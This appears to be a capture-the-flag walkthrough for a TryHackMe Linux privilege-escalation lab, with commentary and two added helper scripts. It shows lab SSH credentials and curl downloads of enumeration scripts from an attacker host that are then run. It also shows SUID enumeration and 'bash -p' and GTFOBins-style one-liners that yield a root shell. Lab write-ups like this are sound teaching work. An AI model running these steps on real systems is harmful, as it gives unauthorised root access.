[TryHackMe] Advent of Cyber 2, Day 11 - Walkthrough -
"Advent of Cyber 2" is provided as a free room: you can deploy its virtual machines without a subscription.
The walkthrough index for "Advent of Cyber 2" is published in "[TryHackMe] I took part in Advent of Cyber 2".
[Day 11] Networking: The Rogue Gnome
Story
This is it! The moment Elf McEager has been waiting for: the final exam of the Nmap course he wanted back in "Day 8 - What's Under the Christmas Tree?". All the hard work has been building up to this... "Success!" cried Elf McEager. "The exploit worked! Yippeee!"
Elf McEager has successfully established a reverse shell from the target to his own machine. Little did he know, the real test was yet to come... The final stage of the exam requires Elf McEager to escalate his privileges. He spent so much time studying his Nmap cheat sheet that he has now drawn a blank... Help Elf McEager!
To be the good guy, sometimes you gotta be the bad guy first...
Day 11 - #1.
What type of privilege escalation involves using a user account to execute commands as an administrator?
This is vertical privilege escalation: moving from a lower-privileged account to a higher-privileged one. Horizontal escalation, by contrast, is taking over another account at the same privilege level.
Day 11 - #2.
What is the name of the file that contains a list of users who are a part of the sudo group?
The room's intended answer is the sudo policy file, /etc/sudoers. Strictly speaking it holds sudo rules (for example the stock Ubuntu line %sudo ALL=(ALL:ALL) ALL), while membership of the sudo group itself is recorded in /etc/group. The file is readable only by root (mode 0440), so from an unprivileged shell the way to see the rules that apply to you is sudo -l.
kali@kali:~$ ls -l /etc/sudoers
-r--r----- 1 root root 669 Jul 12 11:52 /etc/sudoers
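The distinction above, as an added example that is not part of the original walkthrough: the policy lives in /etc/sudoers, the group membership in /etc/group, and a privilege-escalation check reads both. The two inputs are constructed excerpts in the real files' layouts; the user "elf" and its NOPASSWD rule are assumptions, not content of the room.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: where "who can sudo"
# is actually recorded. /etc/sudoers holds the policy (which users and groups
# may run which commands); membership of the sudo group is a line in
# /etc/group. Both samples below are constructed.

# Constructed /etc/group excerpt in the real file's layout:
# name:password:gid:member1,member2
SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,cmnatic
sudo:x:27:cmnatic,elf
users:x:100:'

# Constructed /etc/sudoers excerpt: the stock Ubuntu rules plus one
# hypothetical NOPASSWD rule (the user "elf" and the command are assumptions).
SAMPLE_SUDOERS='# User privilege specification
root    ALL=(ALL:ALL) ALL

# Members of the sudo group may run any command
%sudo   ALL=(ALL:ALL) ALL
elf     ALL=(ALL) NOPASSWD: /usr/bin/find
#includedir /etc/sudoers.d'

# group_members NAME: print the members of group NAME, one per line, from
# /etc/group-format input on stdin (4th colon-separated field, comma-joined).
group_members() {
    awk -F: -v g="$1" '$1 == g {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }'
}

# sudoers_rules: the effective lines of sudoers-format input on stdin, i.e.
# everything that is not a comment or blank. #include and #includedir look
# like comments but are directives that pull in more rules, so they are kept.
# These rules, not the group listing, decide what sudo will actually run.
sudoers_rules() {
    awk '/^[ \t]*$/ { next }                 # blank line
         /^[ \t]*#include/ { print; next }   # directive, not a comment
         /^[ \t]*#/ { next }                 # comment
         { print }'
}

# nopasswd_rules: rules that need no password. In a privilege-escalation
# check these are what to read first; "sudo -l" shows the live equivalent
# for the current user even though /etc/sudoers itself is mode 0440.
nopasswd_rules() {
    sudoers_rules | grep 'NOPASSWD'
}

# Stand-alone run over the samples. On a real host the same functions take
# the live files:  group_members sudo < /etc/group ; sudo -l
printf 'sudo group members:\n'
printf '%s\n' "$SAMPLE_GROUP" | group_members sudo
printf 'passwordless rules:\n'
printf '%s\n' "$SAMPLE_SUDOERS" | nopasswd_rules
```

Run it as-is to see the sample results; the point of keeping the #includedir line is that on Ubuntu most site-specific rules live in /etc/sudoers.d, so a check that only reads /etc/sudoers and strips every "#" line would miss them.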
Day 11 - #3.
Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP
Input the following password when prompted: aoc2020
kali@kali:~$ ssh cmnatic@10.10.178.95
The authenticity of host '10.10.178.95 (10.10.178.95)' can't be established.
ECDSA key fingerprint is SHA256:Epte0uGyoBmg5Gb9zRw9f26JYUHv72UFd1VVNHcItUQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.178.95' (ECDSA) to the list of known hosts.
cmnatic@10.10.178.95's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Dec 12 01:25:04 UTC 2020
System load: 0.0 Processes: 92
Usage of /: 27.8% of 14.70GB Users logged in: 0
Memory usage: 16% IP address for eth0: 10.10.178.95
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
68 packages can be updated.
0 updates are security updates.
Last login: Wed Dec 9 15:49:32 2020
-bash-4.4$
Day 11 - #4.
Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.
You may find uploading some of the enumeration scripts that were used during today's task to be useful.
The transfer below serves the scripts from the attacking machine with Python 2's SimpleHTTPServer module (on Python 3 the equivalent is python3 -m http.server 8080) and pulls them onto the target with curl. The find command that follows lists every regular file with the setuid bit set (-perm -u=s), with errors from unreadable directories sent to /dev/null. Compare the result against what a stock Ubuntu 18.04 install ships SUID: /bin/bash is the odd one out, and its GTFOBins SUID entry is simply the -p flag.
kali@kali:~/OffsecVM$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.178.95 - - [11/Dec/2020 20:37:30] "GET /LinEmu.sh HTTP/1.1" 200 -
-bash-4.4$ curl http://10.11.19.198:8080/LinEmu.sh -o LinEmu.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 46630 100 46630 0 0 42390 0 0:00:01 0:00:01 --:--:-- 42390
-bash-4.4$
-bash-4.4$ chmod +x LinEmu.sh
-bash-4.4$ ./LinEmu.sh
-bash-4.4$ curl http://10.11.19.198:8080/linpeas.sh -o linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 228k 100 228k 0 0 100k 0 0:00:02 0:00:02 --:--:-- 100k
-bash-4.4$ chmod +x linpeas.sh
-bash-4.4$ ./linpeas.sh
-bash-4.4$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/bash
/bin/ping
/snap/core/10444/bin/mount
/snap/core/10444/bin/ping
/snap/core/10444/bin/ping6
/snap/core/10444/bin/su
/snap/core/10444/bin/umount
/snap/core/10444/usr/bin/chfn
/snap/core/10444/usr/bin/chsh
/snap/core/10444/usr/bin/gpasswd
/snap/core/10444/usr/bin/newgrp
/snap/core/10444/usr/bin/passwd
/snap/core/10444/usr/bin/sudo
/snap/core/10444/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/10444/usr/lib/openssh/ssh-keysign
/snap/core/10444/usr/lib/snapd/snap-confine
/snap/core/10444/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
-bash-4.4$
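Triage of a listing like the one above, as an added example that is not part of the original walkthrough: drop the /snap/core copies, subtract a baseline of binaries that are SUID on a stock install, and print a GTFOBins-style hint for what is left. The sample list is the find output shown above with most /snap duplicates trimmed; the Ubuntu 18.04 baseline is an assumption (take your own from a clean machine of the same release), and the hint table covers only a few programs whose GTFOBins SUID entries are one-liners.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: triage a SUID listing
# so that the binaries worth looking up on GTFOBins stand out.

# Constructed sample: the find output from the walkthrough, with the
# /snap/core/* duplicates trimmed to three entries to keep it short.
SAMPLE_SUID_LIST='/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/bash
/bin/ping
/snap/core/10444/bin/mount
/snap/core/10444/usr/bin/sudo
/snap/core/7270/bin/su
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine'

# Baseline of binaries that are SUID root on a stock Ubuntu 18.04 server
# install (assumption: another release or a desktop install needs its own
# baseline, ideally produced on a clean machine with the same find command).
UBUNTU_1804_SUID_BASELINE='/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine'

# suid_anomalies: read SUID paths on stdin and print the ones not in the
# baseline. Paths under /snap/ are the core snap's own copies of the same
# system binaries (mount, su, sudo, ...), so they are skipped instead of
# being reported once per snap revision.
suid_anomalies() {
    grep -v '^/snap/' | while IFS= read -r path; do
        if ! printf '%s\n' "$UBUNTU_1804_SUID_BASELINE" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# gtfobins_hint PATH: for a few programs whose GTFOBins SUID entry is a
# one-liner, print the command that keeps the effective UID. The -p flag is
# the key detail: without it bash and dash reset euid to the caller's uid.
# Anything not in this table gets no output (exit 1) and is looked up by hand.
gtfobins_hint() {
    case "$(basename "$1")" in
        bash|dash) printf '%s -p\n' "$1" ;;
        env)       printf '%s /bin/sh -p\n' "$1" ;;
        find)      printf '%s . -exec /bin/sh -p \\; -quit\n' "$1" ;;
        *)         return 1 ;;
    esac
}

# Stand-alone run over the sample. On a live target feed the real listing:
#   find / -perm -u=s -type f 2>/dev/null | suid_anomalies
printf '%s\n' "$SAMPLE_SUID_LIST" | suid_anomalies | while IFS= read -r odd; do
    printf 'unexpected SUID: %s\n' "$odd"
    gtfobins_hint "$odd" || printf '  (no built-in hint; check GTFOBins)\n'
done
```

On the sample the only line that survives the baseline is /bin/bash, with the hint "/bin/bash -p", which is exactly the step used in the next question. The baseline approach also catches the other common case, a legitimate binary that was recently made SUID, which a GTFOBins name match alone would treat the same as a stock one.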
Day 11 - #5.
Use this executable to launch a system shell as root.
What are the contents of the file located at /root/flag.txt?
The executable is /bin/bash. When bash starts with an effective UID that differs from the real UID, it resets the effective UID to the real one unless it was started with -p (privileged mode), so the SUID bit on /bin/bash does nothing without that flag and gives a root shell with it. whoami reports root because it reads the effective UID; id would show uid=cmnatic alongside euid=root.
-bash-4.4$ whoami
cmnatic
-bash-4.4$ bash -p
bash-4.4# whoami
root
bash-4.4# cat /root/flag.txt
thm{2fb1{BLOCKED}6592}
Useful TryHackMe rooms
Walkthrough
Reference
Original article: https://qiita.com/v_avenger/items/0df365675d02a35a7603